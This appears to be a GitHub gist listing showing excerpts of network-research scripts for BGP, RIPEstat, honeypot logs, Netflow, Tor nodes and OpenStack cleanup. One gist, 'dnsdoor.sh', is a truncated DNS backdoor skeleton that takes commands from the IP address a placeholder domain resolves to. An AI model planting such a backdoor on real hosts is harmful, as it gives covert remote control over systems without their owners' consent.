Antonio Ojea aojea
@aojea
aojea / RRIPEstat
Created August 26, 2014 10:36
R functions to use the RIPEStat API
library("jsonlite")
# Function that returns the country code of an IP address
geoloc<-function(x){
  return(fromJSON(paste0("https://stat.ripe.net/data/geoloc/data.json?resource=",x))$data$locations$country)
}
# Function that returns the ASN of an IP address
getasn<-function(x){
  return(fromJSON(paste0("https://stat.ripe.net/data/network-info/data.json?resource=",x))$data$asns[1])
}
#!/bin/sh /etc/rc.common
#
# License GPLv2
# Version 0.1
# Original script from http://wiki.openwrt.org/doc/howto/packet.scheduler/packet.scheduler.example4
# Modified for control in LAN interface too
START=99
EXTRA_COMMANDS="status"
@aojea
aojea / bgpdump2edge.pl
Created January 22, 2015 15:16
Perl script to generate an edge list from a bgpdump output
#!/usr/bin/perl
# Read the bgpdump output and generate an edge list with two columns: source, destination
use strict;
use warnings;
my $filename = $ARGV[0]; # store the 1st argument into the variable
open FILE, '<', $filename or die $!; # open the file for reading, or die with the OS error
while (<FILE>) {
@aojea
aojea / Rscrape.R
Created January 22, 2015 15:26
Scrape for malware collection
library(XML)
library(RMySQL)
library(jsonlite)
geoloc<-function(x){
  return(fromJSON(paste0("https://stat.ripe.net/data/geoloc/data.json?resource=",x))$data$locations$country)
}
getasn<-function(x){
  return(fromJSON(paste0("https://stat.ripe.net/data/network-info/data.json?resource=",x))$data$asns[1])
}
@aojea
aojea / BGPinternet.R
Created January 22, 2015 19:45
Internet visualization
library(data.table)
library(bit64)
library(igraph)
library(BioNet)
# Modify with the country
country<-"ES"
# You need the file with the edges generated with the script bgpdump2edge.pl
# Read edge file SRC,DST,IP Prefix, nº ASes AS PATH
edges.df<-fread("bgp/edges2.txt",sep=",",colClasses=c("character","character","character","integer"),header=FALSE)
@aojea
aojea / rsslog2csv.py
Created February 10, 2015 10:49
Download rss log from @Malwared_ honeypot, process it and output a csv
#!/usr/bin/python
import os
import feedparser
import GeoIP
import csv
# assume that maxmind .dat files are in the same directory
# otherwise change the path
gi = GeoIP.open("GeoIP.dat",GeoIP.GEOIP_STANDARD)
@aojea
aojea / importES.py
Created February 20, 2015 13:41
Import Netflow CSV Elasticsearch
#!/usr/bin/python2.7
import csv, sys, time, json, elasticsearch
from elasticsearch import Elasticsearch
from elasticsearch import helpers
mapping = {
"fnf1x": {
"properties": {
"ts": {"type": "date", "format" : "YYYY-MM-dd HH:mm:ss"},
@aojea
aojea / dnsdoor.sh
Last active August 29, 2015 14:16
dns backdoor
#!/bin/ash
TASK=`ping -c 1 your.domain.here | grep PING | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'`
case $TASK in
127.0.0.1)
#Your code here
Message="Ok1"
;;
127.0.0.2)
@aojea
aojea / tor2geoipcsv.py
Last active August 29, 2015 14:17
Geoloc Tor nodes
#!/usr/bin/python
import os
import re
import GeoIP
import csv
import urllib2
# Update maxmind databases:
os.system('wget -N http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz')
@aojea
aojea / cleanup_neutron.sh
Created December 28, 2015 18:54
Script to clean up neutron objects, in this case it cleans all rally remaining routers and networks
for router_id in `neutron router-list | grep 's_rally' | awk '{print $2}'`; do
    neutron router-gateway-clear $router_id
    subnet_id=`neutron router-port-list $router_id | grep 'subnet_id' | awk '{print $8}' | awk -F '\"' '{print $2}'`
    neutron router-interface-delete $router_id $subnet_id
    neutron router-delete $router_id
    net_id=`neutron subnet-show $subnet_id | grep 'network_id' | awk '{print $4}'`
    neutron subnet-delete $subnet_id
    neutron net-delete $net_id
done